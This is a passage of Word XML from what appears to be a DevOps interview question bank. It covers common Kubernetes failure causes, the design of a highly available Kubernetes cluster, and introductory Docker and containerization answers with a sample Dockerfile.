        <w:t>Failed to pull image</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. OOMKilled (Out of Memory)</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container exceeds memory limit</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No proper resource tuning</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod restarts unexpectedly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Node NotReady</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubelet down</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * network failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * disk pressure / memory pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runtime issues</w:t>
        <w:br/>
        <w:t>Impact:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods rescheduled elsewhere</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Service not reachable</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong selector in Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Endpoint not registered</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-proxy issue</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network policy blocking traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. DNS resolution failure</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CoreDNS pods down</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Misconfigured DNS policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network issues between Pods and DNS</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services not reachable by name</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Network policy blocking traffic</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Over-restrictive NetworkPolicy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Missing ingress/egress rules</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod can’t communicate with other services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Crash due to liveness probe failure</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong probe configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * App slow startup</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency delay</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes keeps restarting Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. API server issues</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * etcd overload</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * high API request volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * control plane failure</w:t>
        <w:br/>
        <w:t>Impact:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubectl commands fail or slow</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>11. etcd failure (critical)</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Disk full</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Corruption</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network partition</w:t>
        <w:br/>
        <w:t>Impact:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cluster becomes unstable or read-only</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>12. Scheduling failures</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No matching node resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Affinity/anti-affinity conflict</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resource quota limits</w:t>
        <w:br/>
        <w:t>Symptom:</w:t>
        <w:br/>
        <w:t>0/3 nodes are available</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>13. Persistent Volume (PV) issues</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * PVC not bound</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Storage class misconfigured</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud volume provisioning failure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>14. ConfigMap / Secret issues</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Missing keys</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong mount paths</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Incorrect environment injection</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>15. HPA not scaling</w:t>
        <w:br/>
        <w:t>Cause:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * metrics-server not installed</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * wrong CPU threshold</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * missing resource requests</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple classification</w:t>
        <w:br/>
        <w:t>Control plane failures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * etcd issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API server overload</w:t>
        <w:br/>
        <w:t>Node-level failures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubelet down</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * node not ready</w:t>
        <w:br/>
        <w:t>Application-level failures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CrashLoopBackOff</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OOMKilled</w:t>
        <w:br/>
        <w:t>Networking failures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * service unreachable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * network policies</w:t>
        <w:br/>
        <w:t>Storage failures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * PVC/PV binding issues</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes as a city:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nodes = buildings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = rooms</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Failures = electricity issues, broken elevators, blocked roads, missing addresses</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Common Kubernetes failures include pod scheduling issues, image pull errors, CrashLoopBackOff, OOMKilled containers, node NotReady states, DNS resolution failures, service connectivity issues, storage binding problems, and control plane failures, all of which typically arise from resource constraints, misconfigurations, networking issues, or underlying infrastructure problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q340. Design a highly available Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A highly available (HA) Kubernetes cluster design in Kubernetes focuses on ensuring no single point of failure across control plane, worker nodes, networking, and storage so workloads keep running even during failures.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Core Design Goal</w:t>
        <w:br/>
        <w:t>Keep the cluster operational even if a node, zone, or control-plane component fails.</w:t>
        <w:br/>
        <w:t>This is achieved by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-master control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Distributed etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-node pools across zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Redundant networking and load balancing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. High-Level Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               Global Load Balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">            -----------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">            |                           |</w:t>
        <w:br/>
        <w:t xml:space="preserve">     API Server LB              Ingress / LB</w:t>
        <w:br/>
        <w:t xml:space="preserve">            |</w:t>
        <w:br/>
        <w:t xml:space="preserve">   -------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">   |        |        |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Master1  Master2  Master3   (Control Plane - HA)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   |        |        |</w:t>
        <w:br/>
        <w:t xml:space="preserve">        etcd Cluster (3/5 nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   |        |        |</w:t>
        <w:br/>
        <w:t>-------------------------------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Worker Nodes (multi-zone node pools)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   |        |        |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> App Pods (replicated across zones)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Control Plane HA Design</w:t>
        <w:br/>
        <w:t>3.1 Multiple Master Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Minimum 3 control plane nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spread across different availability zones</w:t>
        <w:br/>
        <w:t>Components:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-apiserver (active-active)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-controller-manager (leader election)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-scheduler (leader election)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3.2 API Server Load Balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use external Load Balancer (AWS ELB / NGINX / HAProxy)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routes traffic to healthy API servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3.3 etcd Cluster (critical)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 3 or 5 node quorum-based cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Must be odd number for quorum</w:t>
        <w:br/>
        <w:t>etcd quorum: 2/3 or 3/5 required</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Data replication across masters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3.4 High Availability Principle</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * If 1 master fails → cluster still works</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * If 2/3 etcd nodes survive → cluster continues</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Worker Node Design</w:t>
        <w:br/>
        <w:t>4.1 Multi-node pools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Separate node pools per workload type:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * frontend nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * backend nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * system nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4.2 Multi-zone deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nodes distributed across AZs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone A</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone B</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone C</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4.3 Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cluster Autoscaler adds/removes nodes dynamically</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Horizontal Pod Autoscaler (HPA) scales workloads</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Application HA Design</w:t>
        <w:br/>
        <w:t>5.1 Replicas</w:t>
        <w:br/>
        <w:t>Use Deployments:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5.2 Pod distribution</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod Anti-Affinity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Topology Spread Constraints</w:t>
        <w:br/>
        <w:t>Ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods spread across nodes/zones</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5.3 Health checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Liveness probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Readiness probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Startup probes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Networking Design</w:t>
        <w:br/>
        <w:t>6.1 CNI Plugin</w:t>
        <w:br/>
        <w:t>Use production CNIs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico (BGP-based)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium (eBPF-based)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6.2 Service Load Balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ClusterIP for internal traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * LoadBalancer for external access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-proxy or eBPF-based routing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6.3 DNS HA</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CoreDNS deployed as multiple replicas</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Autoscaling enabled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Ingress &amp; Traffic Management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use Ingress Controller (NGINX / ALB / Traefik)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deploy across multiple nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * External Load Balancer in front</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Storage HA</w:t>
        <w:br/>
        <w:t>8.1 Distributed storage</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud storage (EBS, GCE PD, Azure Disk)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Or distributed systems (Ceph, EFS)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8.2 Persistent Volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-AZ replicated storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid single-node storage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Security &amp; Policy Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC for access control</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network Policies (Calico/Cilium)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod Security Standards</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Admission controllers / OPA Gatekeeper</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. Observability Stack</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prometheus (metrics)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grafana (dashboards)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Loki/ELK (logs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-state-metrics (cluster state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * metrics-server (autoscaling)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Falco (runtime security)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>11. Failure Handling Strategy</w:t>
        <w:br/>
        <w:t>Failure Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Solution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod rescheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Zone failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-zone deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Master failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HA control plane</w:t>
        <w:br/>
        <w:tab/>
        <w:t>etcd failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>quorum-based replication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>App failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA + restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>multi-CNI redundancy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>12. Disaster Recovery (DR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backup etcd regularly</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cross-region cluster replication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitOps (ArgoCD/Flux)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Blue-green or canary deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>13. Example Production Setup (Real-world)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 3 control plane nodes (multi-AZ)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 5 etcd nodes (odd quorum)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10–100 worker nodes across zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium or Calico CNI</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * NGINX Ingress + cloud LB</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prometheus + Grafana monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ArgoCD for deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>14. Simple Analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = airline system</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Control plane = air traffic control towers (multiple redundant towers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Worker nodes = airports</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = flights</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * etcd = central flight database</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * HA design = ensures flights continue even if one tower or airport fails</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>15. Key Principles (Interview Summary)</w:t>
        <w:br/>
        <w:t>A highly available Kubernetes cluster is designed by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running multi-master control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Using quorum-based etcd cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spreading worker nodes across multiple zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensuring application replication (HPA + replicas)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Using robust networking (CNI + DNS HA)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Adding load balancers and ingress redundancy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Implementing monitoring + automated recovery systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A highly available Kubernetes cluster is a distributed architecture of Kubernetes designed with redundant control plane nodes, quorum-based etcd storage, multi-zone worker node pools, and resilient networking and storage layers to eliminate single points of failure and ensure continuous application availability during node, zone, or component failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Docker &amp; Containers (201–260)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q341. What is Docker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker is an open-source platform that lets you package an application and all its dependencies into a lightweight, portable unit called a container.</w:t>
        <w:br/>
        <w:t>Think of it like this:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Without Docker: “It works on my machine” problems are common because different computers have different operating systems, libraries, and configurations.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * With Docker: The application runs inside a container that includes everything it needs, so it behaves consistently across laptops, servers, and cloud environments.</w:t>
        <w:br/>
        <w:t>Key Concepts</w:t>
        <w:br/>
        <w:t>1. Container</w:t>
        <w:br/>
        <w:t>A container is an isolated environment that contains:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Your application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runtime (e.g., Python, Node.js, Java)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Libraries and dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Configuration files</w:t>
        <w:br/>
        <w:t>Containers share the host OS kernel, making them much lighter than virtual machines.</w:t>
        <w:br/>
        <w:t>2. Image</w:t>
        <w:br/>
        <w:t>An image is a blueprint for creating containers.</w:t>
        <w:br/>
        <w:t>For example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * python:3.12</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * nginx:latest</w:t>
        <w:br/>
        <w:t>You build an image once and run many containers from it.</w:t>
        <w:br/>
        <w:t>3. Dockerfile</w:t>
        <w:br/>
        <w:t>A text file that describes how to build an image.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>FROM python:3.12</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>4. Docker Hub</w:t>
        <w:br/>
        <w:t>A repository where Docker images are stored and shared, similar to GitHub but for container images.</w:t>
        <w:br/>
        <w:t>Why Use Docker?</w:t>
        <w:br/>
        <w:t>✅ Consistent environments</w:t>
        <w:br/>
        <w:t>✅ Easy deployment</w:t>
        <w:br/>
        <w:t>✅ Faster setup for new developers</w:t>
        <w:br/>
        <w:t>✅ Better resource efficiency than virtual machines</w:t>
        <w:br/>
        <w:t>✅ Works well with cloud platforms and microservices</w:t>
        <w:br/>
        <w:t>Docker vs Virtual Machine</w:t>
        <w:br/>
        <w:t>Docker Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Virtual Machine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shares host OS kernel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Includes full guest OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Heavier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Starts in seconds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Starts in minutes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses less memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses more memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Write your application.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Create a Dockerfile.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Build an image:</w:t>
        <w:br/>
        <w:t>docker build -t myapp .</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Run a container:</w:t>
        <w:br/>
        <w:t>docker run -p 8080:8080 myapp</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Access the application in a browser.</w:t>
        <w:br/>
        <w:t>Simple Analogy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image = Recipe</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container = Cake baked from the recipe</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker = The kitchen that follows the recipe consistently everywhere</w:t>
        <w:br/>
        <w:t>Docker is now one of the most widely used tools for application development, testing, deployment, and cloud-native infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q342. Explain containerization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Containerization is the process of packaging an application along with its dependencies, libraries, runtime, and configuration files into a container so that it can run consistently across different environments.</w:t>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>A container includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runtime (Java, Python, Node.js, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Libraries and dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Environment variables and configurations</w:t>
        <w:br/>
        <w:t>Containers share the host operating system’s kernel but run in isolated user spaces.</w:t>
        <w:br/>
        <w:t>Why Containerization?</w:t>
        <w:br/>
        <w:t>Before containerization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Applications worked on one machine but failed on another.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency conflicts were common.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployments were inconsistent.</w:t>
        <w:br/>
        <w:t>With containerization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Applications run the same everywhere.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Environments are portable and reproducible.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployment becomes faster and more reliable.</w:t>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Container Runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Host Operating System</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Infrastructure</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Portability: Run anywhere (laptop, data center, cloud).</w:t>
        <w:br/>
